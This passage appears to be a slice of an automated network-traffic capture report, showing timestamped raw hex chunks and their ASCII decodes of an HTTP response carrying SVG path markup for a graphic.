                                                                                                                                                                                                                                                                          Data Ascii: 2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M312,347.21a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15303INData Raw: 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.91,2.61,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15319INData Raw: 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M367,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15335INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 35 32 2c 33 35 32 2e 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M402.52,352.23a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15351INData Raw: 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 32 2c 31 39 37 2e 39 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M422,197.93a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15367INData Raw: 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: -.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8,2.8,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15383INData Raw: 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 37 39 2c 33 34 39 2e 31 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: th class="cls-9" d="M492.79,349.18a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15399INData Raw: 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 32 32 2c 31 39 34 2e 38 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 41 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,.18,3.33"></path><path class="cls-9" d="M512.22,194.87a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1A2.8,2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15415INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 41 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2c 35 34 33 2c 32 37 36 61 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6A2.94,2.94,0,0,1,543,276a2.82,2.82,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15431INData Raw: 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 30 37 2c 33 34 36 2e 31 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M583.07,346.12a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15447INData Raw: 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: 8,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15463INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15479INData Raw: 2d 39 22 20 64 3d 22 4d 33 39 30 2e 32 34 2c 31 35 39 2e 31 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M390.24,159.13a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15495INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 38 33 2c 33 35 2e 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 34 30 32 2c 33 36 2e 35 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M405.83,35.3a1.62,1.62,0,0,1-.73,2.09A2.36,2.36,0,0,1,402,36.5a2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15511INData Raw: 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 34 2e 31 35 2c 39 32 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M434.15,92.74a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15527INData Raw: 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 34 37 2c 31 35 30 2e 31 39 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M462.47,150.19a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15543INData Raw: 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15559INData Raw: 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30
